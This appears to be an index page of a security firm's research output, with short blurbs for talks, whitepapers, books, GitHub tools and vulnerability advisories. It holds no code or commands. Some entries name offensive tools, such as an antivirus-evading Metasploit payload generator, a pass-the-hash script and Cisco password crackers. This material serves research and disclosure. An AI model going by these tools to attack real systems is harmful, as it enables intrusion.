Ben Williams, security consultant at NCC Group, presented his talk, External Enumeration and Exploitation of Email and Web Security Solutions at Black Hat USA. He also produced two whitepapers which include statistical analysis of the filtering products, services and policies used by some of the world’s top companies. Download presentation…

These slides are from Panagiotis Gkatziroulis’ presentation at the Trust Forum in London. It looks at the common social engineering methods, tools and mitigation involved in social engineering attacks. Download presentation

These slides are from Shaun Jones’ presentation at the Trust Forum in Manchester. He gave examples of real-life phishing attacks and provided tips on how you can protect yourself. Download presentation

These slides are from David Cannings presentation at the 44CON Breakfast Briefing. The talk is titled Automating extraction from malware and recent campaign analysis, and includes an overview of some recent targeted campaigns. Download presentation

DDoS Common Approaches and Failings This webinar looks at the reasons that DDoS mitigation may not be working and what you should be thinking about to protect your business from a DDoS attack, including examples of some testing we have done and common approaches. Download presentation

These slides are from Rory McCunes’ presentation at the Trust Forum in Edinburgh. In his presentation he looked at everything from celebrity hacking to the Heartbleed bug can be explained by a lack of context, and what you can do to avoid the trap of absolute security. Download presentation

These slides are from Irene Michlin’s presentation at the Trust Forum in London. It looked at how much training staff should have on cyber security. Download presentation

Andy Davis, research director at NCC Group, delivered this presentation at the  escar Embedded Security in Cars Conference in Hamburg. His talk focused on how USB security affects embedded systems within vehicles. It covered an overview of USB basics and some classic examples of where vulnerabilities have been previously identified.…

Cyber Essentials Scheme These slides are from Matt Storey’ presentation at the Trust Forum in Manchester. He discussed what Cyber Essentials is, who it is for and the benefits it has to your organisation. Download presentation

This webinar talked through the changes to the new PCI SSC version 3.0 standard in detail and how they will affect your business, the things you need to be thinking about now and the timescales in which you have to react to the changes. Download our presentation Download the presentation…

David Cannings, Principal Consultant at NCC Group, delivered a fantastic webinar on four key considerations when building a robust incident response plan.  The webinar covered: An introduction – why a plan is needed What the risks are Four key considerations Case studies for each consideration More resources on incident response…

These slides are from David FB.Page presentation at the Manchester Trust Forum. The presentation includes information on cloud security and how the different types of cloud implementations could affect your organisation’s security. Download presentation

These slides were presented as part of the SMACK, SKIP-TLS FREAK SSL/TLS vulnerabilities webinar series Our Technical Director, Ollie Whitehouse covered: High level overview of the threat Impact of the threat What is affected/impacted by it Details on how the exploitation works Details on Man in the Middle How to…

Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions These slides come from Andy Davis’ presentation at Black Hat USA 2013. Andy’s presentation covers the topic of using techniques to analyse USB stack interactions to provide information such as the OS running on the embedded device, the USB drivers installed…

A memory searching utility across multiple processes, that allows you to: Opens each process. Works out the valid memory pages. Search for ascii and unicode incarnation of the string. To download the tool, visit our GitHub page here.

The NCC Group Game from 44CON 2013 – a knowledge based multiple choice game for conferences.  For more information and to download the game, visit our GitHub page here. 

A primitive website scanner currently under development by an NCC Group employee and University graduate with 20% research time. creep currently crawls a site, and searches for potentially interesting information within each page. creep will crawl your (HTTP only) target and pull interesting info on the site, including: Source code…

NCC Code Navi the Text Viewer and Searcher for Code Reviewers, which allows: Easily search across code Ability to have multiple instances of the same file / search queries open concurrently Inbuilt note keeper Send different aspects of filenames, path, code to the note keep easily Select a word or…

Raw bytes manipulation utility, able to apply well known and less well-known transformations. For more information and to download the tool, visit our GitHub page here. 

A web service written in Python designed to identify registered yet mistyped DNS domains. This utility will check if web server, mobile and mail handling DNS records have also been registered. In addition geo IP is used to locate the country that the registered IPv4 and IPv4 addresses are present…

This tool encompasses two distinct features. It guesses the IOCTL values that the driver accepts and also their valid size limitations and store the results are in a file for future reuse. The second feature is comprised of 3 dumb fuzzers: a pure random fuzzer, a sliding DWORD fuzzer and…

IODIDE – The IOS Debugger and Integrated Disassembler Environment Released as open source by NCC Group Plc Developed by Andy Davis, andy dot davis at nccgroup dot com To download visit: https://github.com/nccgroup/IODIDE Released under AGPL see LICENSE for more information Includes the PowerPC disassembler from cxmon by Christian Bauer, Marc…

CECSTeR is the Consumer Electronics Control Security Testing Resource – a GUI-based tool to perform security testing against the HDMI CEC (Consumer Electronics Control) and HEC (HDMI Ethernet Channel) protocols.  For more information and to download the tool visit our GitHub page here.

Cisco SNMP enumeration, brute force, config downloader and password cracking script. For more information and to download the tool, visit our GitHub page here.

Small script to check if the .NET web application is vulnerable to padding Oracle. This script actually verify if the oracle is present and exploitable, not just if the patch has been installed. For more information and to download the tool, visi out GitHub page here.

NCC Code Navi the Text Viewer and Searcher for Code Reviewers. For more information and to download the tool, visit our GitHub page here. 

This tool is an Easy Windows Domain Access Script which finds common password hashes on Windows networks (pass the hash), and Locates logged in Domain Administrator accounts.  For more information and to download the tool, vist our GitHub page here. 

A tool for fuzzing Enhanced Display Identification Data, developed by Andy Davis. For more information and to download the tool visit our GitHub page here.

Fat-Finger extends the original finger.nse and attempts to enumerate current logged on users through a full match of the username and a partial match of the GECOS field in /etc/passwd.  For more information and to download the tool, visit our GitHub page here. 

firstexecution is a collection of different ways to execute code outside of the expected entry points.  For more information and to download the tool, visit our GitHub page here. 

Grepify the GUI Regex Text Scanner for Code Reviewers.  For more information and to download the tool, visit our GitHub page here.

FrisbeeLite is a GUI-based USB device fuzzer, developed by Andy Davis.  For more information and to download the tool, visit our GitHub page here.

Email was not designed to be used the way it is today. Organisations rely on email for daily business communication and while most are protecting against low-level threats, more sophisticated email-based attacks are on the rise. This NCC Group whitepaper highlights the overall risks that organisations face when using email…

We’ve published a short eBook based on our experience of dealing with numerous ransomware cases in the last few years. The eBook is designed to provide real-world advice as to what organisations should do to minimise the likelihood of initial infection as well as limit any impact should that fail.…

A Windows application to help out with external infrastructure scans that can be used for the following: Convert a file of IP addresses to hostnames (output a straight list of hostnames or comma separated list of IP Address, Hostname) Convert a file of hostnames to IP addresses (output a straight…

Lapith is a Python GUI tool that presents Nessus results in a format more useful for penetration testers. Results can be viewed by issue as opposed to by host. It is therefore easier to report all the hosts affected by an issue, rather than all of the issues affecting the…

Metasploit payload generator that avoids most Anti-Virus products. For more information and to download the tool, visit our GitHub page here.

This presentation about maritime cyber security, delivered at the CIRM Annual Meeting in Cyprus, looks at the cyber threats to the maritime industry, an overview of the attack surface, the impact of some of the risks they face and a look at what solutions are available in the short, medium…

A tool to generate Snort rules or Cisco IDS signatures based on public IP/domain reputation data.  For more information and to download the tool, visit our GitHub page here.

This presentation about the “lameness of passwords” was delivered by Ben Williams, senior security consultant at NCC Group, at the 44Con Café event at the IP Expo in Manchester. Williams talked about his experience of breaking into networks and applications with a variety of password attack tools and techniques. It…

These slides are from Matt Storey’s presentation at the Edinburgh Trust Forum. This presentation looks at security testing frameworks, the scheduling aspects of the various forms of testing and other options, such as using STAR or red team assessments to test gaps in IT security controls. Download presentation

These slides are from Jason Geffner’s presentation “Exporting Non-Exportable RSA Keys” that he presented at Black Hat Europe in 2011. In this presentation Jason will cover security issues surrounding RSA keys and Digital Certificates. Download presentation To read the white paper that accompanies these slides click here.

Broadcasting your attack – DAB security This presentation was presented at Black Hat USA 2015  Digital Audio Broadcasting (DAB) radio receivers can be found in many new cars and are often integrated into what has become known as the “infotainment system” – typically a large screen in the dashboard that…

These slides are from a presentation, “The Role of Security Research in Improving Cyber Security” by Andy Davis. The presentation discusses the role of security research in helping to improve cyber security.  Download presentation

Matt Lewis, associate director at NCC Group presented a talk at the Oredev conference in Sweden on how self-driving cars is no longer science fiction. Investment is already being made into this area and commercially available vehicles will be available in the next decade. Matt’s talk discusses the possibilities and…

These slides are from Ben Williams’ presentation “They ought to know better: Exploiting Security Gateways via their Web Interfaces”, that he presented at Black Hat Europe in 2012. In this presentation Ben will discuss the 40+ exploits that have been discovered and ways that some of these can be used…

In this presentation Ollie Whitehouse will be discussing How to develop or purchase COTS mobile apps for my enterprise while ensuring security.  Download presentation

These slides come from Alex Stamos Tom Ritter’s presentation, “The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet” from Black Hat USA in 2012. In this presentation will cover the new changes to the internet’s infrastructure and the concerns around this. Download presentation

These slides come from Justine Osborne Alban Diquet’s presentation from Black Hat USA 2012. In this presentation they will explain what certificate pinning is and how it works in the IOS and Android systems. Download Presentation

These slides come from Andy Davis’ presentation from Black Hat USA in 2011. In this presentation Andy will discuss some of the security vulnerabilities around using USBs and the impact these vulnerabilities could have on your organisation.  Dowload Presentation There is also a white paper on this subject, you can…

These slides come from Ollie Whitehouse’s presentation “Software Security Austerity Security Debt in Modern Software Development” that he gave at 44Con in 2012. In this presentation Ollie will explain software security debt and ways that this debt can be managed. Download presentation

These slides are from Ollie Whitehouse’s presentation from the 2012 RSA Conference, eFraud Global Forum in London. In this presentation Ollie will discuss some of the big trends in mobile security form 2012, providing some technical details and real world examples, and then he will give his predictions for threats…

These slides are from Ollie Whitehouse’s presentation from Hack in the Box in Kuala Lumpur. In the presentation Ollie will discuss the What, Why and How of discovering weak link in binaries.  Download presentation

These slides come from Andy Davis’ presentation from BlackHat Europe 2013. In this presentation he will explain why docking stations are an attractive target for an attacker, how they can be attacked and discuss ways to detect and prevent such attacks.  Download Presentation You can also read the white paper…

These slides come from Marc Blanchou’s presentation at Black Hat Europe, Harnessing GP Us: Building Better Browser Based Botnets. In the presentation Marc discusses Harnessing GPUs with browser-based botnets for distributed and cheaper cracking, and will consider botnet impact, cost, stealth requirements and portability when building better browser based botnets.…

Author: Wade Alcorn, Christian Frichot, Michele Orru Michele Orru, from the Group’s  Fort Consult Division, has co-authored The Browser Hacker’s Handbook, with former NCC Group security consultant Wade Alcorn. The book gives practical understanding of hacking the everyday web browser. It contains expert advice on topics such as ARP spoofing,…

Author: Bill Grindlay , David Litchfield Bill Grindlay, principal software architect at NCC Group, has co-authored SQL Server Security. The book provides in-depth coverage of the installation, administration, and programming of secure Microsoft SQL Server environments and applications. It covers some of the latest techniques such as Installing and configuring…

Author: David Litchfield, Chris Anley, John Heasman, Bill Grindlay  NCC Group’s Bill Grindlay, principal software architect and Chris Anley, chief technical scientist, has co-authored The Database Hacker’s Handbook. The book helps readers to understand how to break into and defend the seven most popular database servers. It contains expert advice…

Author: Gavin Watson, Richard Ackroyd, Andrew Mason Gavin Watson and Richard Ackroyd, security engineers at RandomStorm, part of NCC Group, have co-authored a book with former RandomStorm engineer Andrew Mason. The book includes information on practical methodology and everything you need to plan and execute a social engineering penetration test…

Peeling back the layers on defence in depth…knowing your onions An NCC Group whitepaper Is your organisation fully prepared for malicious attacks from both motivated external attackers and internal threat actors? As the threat landscape continues to evolve it is vital that organisations understand where the threats are and how…

End-of-life pragmatism – an NCC Group whitepaper Does your organisation have a robust IT Refresh Policy in place? One of the main concerns relating to the replacement of IT infrastructure is the cost.  The risk of introducing compatibility issues and, ultimately, downtime  also causes anxiety. However, exploitation of vulnerabilities in…

Vulnerability Summary Title: Microsoft Office Memory Corruption VulnerabilityRelease Date: 10 March 2016Reference: NCC00886Discoverer: Richard WarrenVendor: MicrosoftVendor: Reference MS16-029Systems Affected: Tested on Microsoft Office 2010 on Windows 7CVE Reference: CVE-2016-0021Risk: MediumStatus: Fixed Download technical advisory

Vulnerability Summary Title                                     Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode Release Date                     10 March 2016 Reference  …

UK plc wants tougher cyber regulation and more punishment for failings 71% of UK board directors want companies to be penalised for failing to meet basic cyber security requirements, according to new research from global cyber security and risk mitigation expert NCC Group. In what appears to be a sea…

Title                           Flash local-with-filesystem Bypass in navigateToURLReference                 VT-19Discoverer                Soroush Dalili and Matthew EvansVendor                    …

Title                                  D-Link routers vulnerable to Remote Code Execution (RCE) Release Date                   11 Aug 2016 Reference                    …

Author: David Thiel This book is the definitive guide for hackers and developers allowing readers to understand and eliminate security holes in iOS Application Security. Former NCC Group security consultant, David Thiel, authored this book, which includes information about common iOS coding mistakes that create serious security problems and how…

Author: Dominic Chell, Tyrone Erasmus, Shaun Colley, Ollie Whitehouse.  Ollie Whitehouse, technical director at NCC Group, has co-authored The Mobile Application Hacker’s Handbook.  The book helps readers to understand how to secure mobile phones by approaching the issue from a hacker’s point of view. It contains expert guidance on topics…

NCC Group’s latest Research Insights paper provides a view on modern vulnerability discovery approaches.The identification of vulnerabilities and understanding what is involved in their exploitation has numerous applications in both the attack and defence side of cyber security. The way in which software vulnerabilities are discovered has evolved considerably over…

Organisations that need to keep long-term secrets, or which are designing systems that will be in use for ten or more years, need to plan for a post-quantum-computing world. This whitepaper gives a short introduction and overview of post-quantum cryptography. We discuss why post-quantum crypto is needed and provide handles…

Author(s): Chris Anley, John Heasman, Felix Lindner and Gerardo Richarte. The Shellcoder’s Handbook takes a detailed look at why security holes appear, how to discover them and how to close them so that they can’t be exploited. In this revised 2007 second edition, many new exploitation techniques are explored that were…

Vulnerability Summary Title                               Potential false redirection of web site content in Internet in SAP NetWeaver web applications Release Date               8 March 2016 Reference              …

Vulnerability Summary Title                               Multiple security vulnerabilities in SAP NetWeaver BSP Logon Release Date               8 March 2016 Reference                    NCC00837 Discoverer      …

Voice biometrics are becoming an attractive mechanism for authenticating users in online and mobile environments. They may, however, not always be the best choice of authentication mechanism, depending on the performance and assurance requirements of the underlying application. A feasibility study should always be performed on the use of biometrics…

A common misconception by Windows system administrators is that keeping operating systems fully updated is sufficient to keep them secure. However, even on a network which is fully patched and using the latest Windows operating systems, it is often trivial for an internal attacker to obtain user credentials, and in…

In this paper, Justin Engler discusses the challenges of secure messaging for normal people based on his presentation entitled “Secure Messaging” from DEF CON 23. “Secure” messaging programs and protocols continue to proliferate, and crypto expertscan debate their minutiae, but there is very little information available to help therest of…

Abstract: Governments and businesses recognise that absolute cyber security is neither possible nor practical. In the public sector the risks are in part addressed by the adoption of various compensating controls that align with various protective marking schemes. The nations which have adopted these controls have also developed resiliencestrategies, in…

With the finalisation of the General Data Protection Regulation (GDPR) it is time for businesses to take stock and prepare for the requirements which will soon be imposed. The GDPR replaces the 1995 EU directive (Directive 95/46/EC ) and begins a new chapter in European privacy. The regulation was published…

Not only are cyber attacks becoming more frequent, they are also becoming more persistent, targeted and at times sophisticated, often causing widespread impact. While some boards and executives of financial services (FS) organisations are being urged to place cyber security at the top of their risk agenda, there still often…

Author: Kurt Wallnau, Scott Hissam, Robert Seacord  Robert Seacord, principal security consultant at NCC Group, has co-authored Building Systems from Commercial Components. The book describes a number of proven techniques, as well as much-needed guidance on how to build component-based systems in a real working environment. Click here for more…

Author: Robert Seacord, Daniel Plakosh, Grace Lewis Robert Seacord, principal security consultant at NCC Group, has written a book about Modernizing Legacy Systems. The book uses an extensive real-world case study (based on the modernisation of a 30-year- old retail system) to show how modernising legacy systems can deliver significant…

Author: Robert Seacord  Robert Seacord, principal security consultant at NCC Group, has written a book about secure coding in C and C++. Readers will be able to learn the root causes of software vulnerabilities and how to avoid them. The book covers some technical details on how to improve the…

Author: Fred Long, Dhruv Mohindra, Robert Seacord, Dean Sutherland, David Svoboda Robert Seacord, principal security at NCC Group, has co-authored Cert Oracle Secure Coding Standard for Java. The book provides a high-level introduction to Java application security and seventeen consistently organized chapters detailing specific rules for key areas of Java development.…

Author: Robert Seacord Robert Seacord, principal security consultant at NCC Group, has written a book about secure coding standard. The book is the essential desktop reference documenting the first official release of The CERT® C Secure Coding Standard. It provides guideline with examples of insecure code as well as secure,…

Author: Fred Long, Dhruy Mohindra, Robert Seacord, Dean Sutherland, David Svoboda Robert Seacord, principal security consultant at NCC Group, has co-authored Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs. The book provides realistic guidance to help Java developers implement desired functionality with security, reliability and maintainability goals in mind.…

Author: Robert Seacord  Robert Seacord, principal security consultant at NCC Group, has created a video book showcasing LiveLessons on professional C programming. The video book provides an in-depth explanation of how to use common C language features to produce robust, secure, and reliable code. Click here for more information. 

Author: Robert Seacord Robert Seacord, principal security consultant at NCC Group, has written a book about secure coding in C and C++. Readers will be able to learn the root causes of software vulnerabilities and how to avoid them. As part of the second edition, the book features topics such…

Author: Robert Seacord Robert Seacord, principal security consultant at NCC Group, has written a book about Cert C Coding Standard. The book is the essential reference for any developer who wishes to write secure and resilient software in C and C++. Click here for more information. 

Author: Robert Seacord Robert Seacord, principal security consultant at NCC Group, has created a video book about secure coding rules for Java It provides developers with practical guidance for developing Java programs that are robust and secure. < p style=”text-align: left;”>Click here for more information.  

Many people are unaware that video displays send data which is then processed by the connected device and that this data can contain security threats. This paper aims to act as a useful introduction to the technologies involved in video interfacing, the potential for security vulnerabilities and ways to test for their…

These slides come from Andy Davis’ presentation “What the HEC? Security implications of HDMI Ethernet Channel and other related protocols” that was given at 44Con in 2012. In this presentation Andy discusses the importance of and security issues surrounding, HDMI, the CEC protocol and the HEC protocol.   Download our slides…

These slides are supporting documentation used as part of a 44CON workshop we held in September 2013 which was delivered by Bernardo Damele on assessing and securing iOS apps. Download Presentation

Over a series of Webinars Rob Chahin of NCC Group presented on the changes to PCI DSS from V2.0 to V3.0. The presentation will explain the changes to requirements that will be implemented from version 2.0 to version 3.0.  Download presentation

NCC Group Research Director Andy Davis presented on The Mobile Internet of Things and Cyber Security at this year’s Mobile World Congress in Barcelona. The presentation covered how everything from rubbish bins to refrigerators have been in the spotlight recently from a security point of view and the key things…

These slides come from a presentation given by Matt Summers at the Cyber Security Breakfast Meetings for Industry in February. “Security is big business, with new threats emerging every day and companies offering software and services to mitigate these threats securing your network can be expensive. No one has an…

NCC Group Research Director Andy Davis presented ‘USB Attacks Need Physical Access Right? Not Any More…’ at this year’s BlackHat Asia in Singapore. Due to recent advances in a number of remoting technologies, USB attacks can now be launched over a network. The talk went into detail about how these…

We showcased at a client’s corporate event how we technically assess and breach network infrastructures, before attackers do. Throughout the talk a number of questions were answered: what network design mistakes and defective assumptions lead to security breaches? What are the weakest entry points of your network perimeter? How do…

NCC Group’s Thomas MacKenzie delivered this live demo on how to hack websites during the NCC Group website performance and optimisation day. Download presentation

These slides are from Andy Davis’ presentation at the European Dynamic Positioning Conference in London. The presentation looks at the cyber threats facing dynamic positioning operations, along with some short-term solutions to increase levels of cyber security. Download presentation

These slides are from Yevgen Dyryavyy’s presentation at the Smart Operations summit in Hong Kong. The presentation, Threats and vulnerabilities within the Maritime sector, features excerpts from the whitepaper he recently authored about the potential weaknesses within Electronic Chart Display and Information Systems and shipboard networks. It also features a…

NCC Group was recently posed the following by one of our UK CISO Research Council members: ‘Blockchain (especially BitCoin) is highly dependent on elliptic curve crypto and hashes like SHA256 and RIPEMD-160, which are all vulnerable to quantum computing attacks using Shaw’s and Grover’s algorithms. The banks are all going…

We’ve published a whitepaper about how we built WiMap, which is a Wi-Fi mapping drone. The paper includes details of the methods used to create, from parts, a hexacopter capable of being controlled over 3/4G and equipped to perform wireless and infrastructure assessments. We’d love to hear your feedback via…

At NCC Group, a colleague and I recently spent some time trying to develop a more robust exploit for the Android libstagefright bug CVE-2015-3684. This is a bug that persisted through the patches Joshua Drake (jduck) originally provided to Google, so a few more firmware versions are vulnerable. In this…

Do you know how your organisation would react in a real-world attack scenario? Find out where your weaknesses lie with a Red Team Assessment and take action now to improve your security posture. In today’s threat landscape, how to mitigate risk and prevent an organisation from becoming victim to a…

This whitepaper is about Erlang Security. NCC Group’s Security Technical Assurance team performs code reviews for clients on numerous different programming languages. Some are well understood from a security perspective (e.g. C, C++, C#, PHP and Python etc.) and some less so. We’ve been doing Erlang security focused code reviews…

This patch notification details a high risk vulnerability in SysAid Helpdesk, discovered by Daniel Compton. Download patch notification

This patch notification details a high risk vulnerability in SysAid Helpdesk, discovered by Daniel Compton. Download patch notification

This patch notification details a number of high risk vulnerabilities in Virtual Access Monitor that have been discovered by Ken Wolstencroft Download Patch Notification

This patch notification details a high risk vulnerability in Whatsupgold Premium, that has been discovered by Daniel Compton.  Download Patch Notification

This patch notification details a high risk vulnerability discovered by Andy Davis within Microsoft Windows. Download Patch Notification

Today we have released a new whitepaper titled: ‘Threat Intelligence: Benefits for the Enterprise’. This paper builds on a number of supporting blog posts we’ve published over the last seven months, namely: Understanding commercial sector threat intelligence and cyber security Threat intelligence: what we can learn from malware analysis Threat…

Static application security testing (SAST) is the analysis of computer software that is performed without the need to actually execute the program. The term is usually applied to analysis performed by an automated tool, whereas human analysis is typically called security-focused code review. The primary objective of SAST is to…

Author: David Cannings This eBook is a simple workbook that walks you through some of the key takeaways to building your own incident response process in your organisation. It provides you with some insight into why a robust incident response plan is needed, the kinds of things that are at…

HDMI is more than just a toll for displaying video and with increasing numbers of new laptops and PCs using the function it is important for organisations to understand the potential security issues that are likely to arise as the protocols start to become more widely used. This paper will…

In this paper the author will explain, in detail, the common SQL injection technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. The paper will also cover the various ways in which SQL can be injected into the application and addresses some of the…

In this threat brief we will discuss the existence of embedded USB keyboards that are becoming increasingly common, these keyboard like devices can be used to bypass the security enhancements in modern operating systems or configuration settings that stop the automatic execution of code from USB devices. However these devices…

In September 2012 NCC Group noted a security issue relating to the use of ASP.NET forms authentication in a shared/cloud hosting environment, which could potentially allow an attacker to successfully authenticate to an application for which they do not have valid credentials. This threat brief will discuss this issue in…

Vulnerability Summary Title: Xen HYPERVISOR_xen_version stack memory revelationRelease Date: 6 March 2015Reference: NCC00817Discoverer: Aaron AdamsVendor: XenVendor Reference: XSA-122Systems Affected: AllCVE Reference: CVE-2015-2045Risk: LowStatus: Fixed Download our technical advisory

Summary Name: Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3Release Date: 30 November 2012Reference: NGS00288Discoverer: Edward Torkington Vendor: MicrosoftVendor Reference:Systems Affected: Windows XP SP3Risk: CriticalStatus: Published TimeLine Discovered:  2 April 2012Released: 11 May 2012Approved: 11 May 2012Reported: 16 April 2012Fixed: 14 August 2012Published: 30 November 2012 Description Terminal Services…

Summary Name: SysAid Helpdesk Pro – Blind SQL InjectionRelease Date: 30 November 2012Reference: NGS00241Discoverer: Daniel Compton Vendor: SysAidVendor Reference:Systems Affected: SysAid Helpdesk 8.5 ProRisk: HighStatus: Published TimeLine Discovered: 12 March 2012Released: 12 March 2012Approved: 12 March 2012Reported: 14 March 2012Fixed:  1 August 2012Published: 30 November 2012 Description SysAid Helpdesk V8.5.04 Pro…

Summary Name: Symantec Messaging Gateway – SSH with backdoor user account + privilege escalation to root due to very old KernelRelease Date: 30 November 2012Reference: NGS00267Discoverer: Ben Williams Vendor: SymantecVendor Reference:Systems Affected: Symantec Messaging Gateway 9.5.3-3Risk: HighStatus: Published TimeLine Discovered: 18 April 2012Released: 18 April 2012Approved: 29 April 2012Reported: 30 April…

Summary Name: Symantec Messaging Gateway – Easy CSRF to add a backdoor-administrator (for example)Release Date: 30 November 2012Reference: NGS00263Discoverer: Ben Williams Vendor: SymantecVendor Reference:Systems Affected: Symantec Messaging Gateway 9.5.3-3Risk: HighStatus: Published TimeLine Discovered: 16 April 2012Released: 16 April 2012Approved: 29 April 2012Reported: 30 April 2012Fixed: 27 August 2012Published: 30 November 2012…

Summary Name: Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom ReportsRelease Date: 2 October 2013Reference: NGS00341Discoverer: Daniele Costa Vendor: SymantecCVE Reference: CVE-2013-4676Systems Affected: Symantec Backup Exec 2012Risk: HighStatus: Published TimeLine Discovered: 10 July 2012Released: 10 July 2012Approved: 10 July 2012Reported: 10 July 2012Fixed: 1 August 2013Published: 30 September 2013…

Summary Name: Symantec Backup Exec 2012 – OS version and service pack information leakRelease Date: 2 October 2013Reference: NGS00344Discoverer: Andy DavisVendor: SymantecCVE Reference: CVE-2013-4678Systems Affected: Symantec Backup Exec 2012Risk: MediumStatus: Published TimeLine Discovered: 18 July 2012Released: 18 July 2012Approved: 18 July 2012Reported: 18 July 2012Fixed: 1 August 2013Published: 30 September…

Summary Name: Symantec Backup Exec 2012 – Linux Backup Agent Heap OverflowRelease Date: 10 August 2012Reference: NGS00342Discoverer: Perran Hill <perran.hill@nccgroup.com>Vendor: SymantecCVE Reference: CVE-2013-4575Systems Affected: Symantec Backup Exec 2012Risk: HighStatus: Released TimeLine Discovered: 13 July 2012Released: 13 July 2012Approved: 13 July 2012Reported: 13 July 2012Fixed: 1 August 2013Published: 30 September 2013…

Summary Name: Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs (RW Everyone)Release Date: 2 October 2013Reference: NGS00347Discoverer: Edward Torkington <edward.torkington@nccgroup.com>Vendor: SymantecCVE Reference: CVE-2013-4677Systems Affected: Symantec Backup Exec 2012Risk: MediumStatus: Published TimeLine Discovered: 24 July 2012Released: 24 July 2012Approved: 24 July 2012Reported: 24 July 2012Fixed: 1 August 2013Published:…

Summary Name: Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding Groups, Servers and ComputersRelease Date: 20 August 2012Reference: NGS00340Discoverer: Matt Lewis <matt.lewis@nccgroup.com>Vendor: SymantecCVE Reference: CVE-2013-4676Systems Affected: Symantec Backup Exec 2012Risk: HighStatus: Released TimeLine Discovered: 6 July 2012Released: 6 July 2012Approved: 6 July 2012Reported: 6 July 2012Fixed:…

Summary Name: Squiz CMS – File Path TraversalRelease Date: 30 November 2012Reference: NGS00330Discoverer: Robert Ray Vendor: SquizVendor Reference: 11846Systems Affected: Squiz CMS V11654Risk: HighStatus: Published TimeLine Discovered: 29 June 2012Released: 29 June 2012Approved:  2 July 2012Reported:  9 July 2012Fixed:  9 August 2012Published: 30 November 2012 Description Squiz CMS V11654 – File…

Summary – 02.11.2011 Name: Solaris 11 USB Hub Class descriptor kernel stack overflowRelease Date:  2 November 2011Reference: NGS00042Discoverer: Andy Davis Vendor: OracleVendor Reference:Systems Affected: Solaris 8, 9, 10, and 11 ExpressRisk: HighStatus: Published TimeLine Discovered: 27 January 2011Released: 27 January 2011Approved: 27 January 2011Reported: 27 January 2011Fixed: 19 July 2011Published:  2 November…

VULNERABILITY SUMMARY Title: SmarterMail – Stored XSS in emailsRelease: Date 6 March 2015Reference: NCC00776Discoverer: Soroush DaliliVendor: Smarter ToolsSystems Affected: v13.1.5451 and priorCVE Reference: TBCRisk: MediumStatus: Fixed Download our technical advisory

Summary Name: Remote code execution in ImpressPages CMSRelease Date:  5 January 2012Reference: NGS00109Discoverer: David Middlehurst Vendor: ImpressPagesVendor Reference:Systems Affected: ImpressPages CMS 1.0.12Risk: HighStatus: Published TimeLine Discovered: 28 August 2011Released: 28 August 2011Approved: 28 August 2011Reported:  5 September 2011Fixed: 21 September 2011Published:  5 January 2012 Description ImpressPages CMS (1.0.12) is prone to…

Summary – 28.06.2011 Name: OS X 10.6.6 Camera Raw Library Memory CorruptionReference: NGS00052Discoverer: Paul Harrington Vendor: AppleVendor Reference: 140299872Systems Affected: OS X 10.6.6 with RawCamera.bundle < 3.6Risk: HighStatus: Published TimeLine Discovered: 22 February 2011Released: 22 February 2011Approved: 22 February 2011Reported: 23 February 2011Fixed: 21 March 2011Published: 28 June 2011 Description A corrupt…

Vulnerability Summary Title:            Oracle Java Installer Adds a System Path Which is Writable by All Users Release Date:      21 January 2015 Reference:         NCC00767 Discoverer:        Edd Torkington Vendor:              Oracle Vendor Reference:  S0514586 Systems Affected:  Oracle Java 8 Version 25 CVE Reference:    …

Summary Name: Oracle Hyperion 11 – Directory TraversalRelease Date: 30 July 2013Reference: NGS00434Discoverer: Richard Warren <richard.warren@nccgroup.com>Vendor: OracleVendor Reference: S0318807Systems Affected: Oracle Hyperion 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlierRisk: HighStatus: Published TimeLine Discovered: 20 November 2012Released: 20 November 2012Approved: 20 November 2012Reported: 20 November 2012Fixed: 16…

Vulnerability Summary Title:                       Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges Release Date:          21 January 2015 Reference:               NCC00774 Discoverer:              Edd Torkington Vendor:                   Oracle Vendor Reference:    S0524388 Systems Affected:     11.5.10.2, 12.0.4,…

Title: Nessus Authenticated Scan – Local Privilege EscalationRelease Date: 20 March 2014Reference: NGS00643Discoverer: Neil JonesVendor: TenableVendor Reference: RWZ-21387-181Systems Affected: Nessus appliance engine version 5.2.1 the plugin set201402092115CVE ReferenceRisk: HighStatus: Fixed Download our technical advisory

NCC Group’s Cyber Defence Operations team has released a technical note about the Derusbi Server variant, which we encountered on an engagement at the end of last year.   You can download this using the link to the right. Download our technical advisory

Summary Name: Nagios XI Network Monitor – Stored and Reflective XSSRelease Date: 30 November 2012Reference: NGS00195Discoverer: Daniel Compton Vendor: NagiosVendor Reference: 0000284Systems Affected: 2011R1.9Risk: HighStatus: Published TimeLine Discovered: 30 January 2012Released: 31 January 2012Approved: 31 January 2012Reported: 31 January 2012Fixed:  4 June 2012Published: 30 November 2012 Description Nagios XI Network Monitor…

Vulnerability Summary Title: Multiple Vulnerabilities in MailEnable Release Date: 10 March 2015 Reference: NCC00777, NCC00778, NCC00779, NCC00780 Discoverer: Soroush Dalili (@irsdl) Vendor: MailEnable Vendor Reference: http://www.mailenable.com/ Systems Affected: Tested on version 8.56 (versions prior to 8.60, 7.60, 6.88, and 5.62 should be vulnerable) CVE Reference: TBC Risk: High Status: Fixed…

Vulnerability Summary*******************Title Microsoft Internet Explorer CMarkup Use-After-FreeRelease Date 6 October 2014Reference NGS00704Discoverer Edward TorkingtonVendor MicrosoftVendor Reference 19160Systems Affected IE6-11CVE Reference CVE-2014-1799Risk HighStatus Fixed Resolution Timeline****************Discovered 22 May 2014Reported 22 May 2014Released 22 May 2014Fixed 22 June 2014Published 6 October 2014(The time between the bug being fixed and this advisory published…

Summary Name: McAfee Email and Web Security Appliance v5.6 – Session hijacking (andbypassing client-side session timeouts)Release Date: 30 November 2012Reference: NGS00154Discoverer: Ben Williams Vendor: McAfeeVendor Reference:Systems Affected:Risk: MediumStatus: Published TimeLine Discovered:  7 November 2011Released: 28 November 2011Approved: 28 November 2011Reported:  4 December 2011Fixed: 13 March 2012Published: 30 November 2012 Description McAfee…

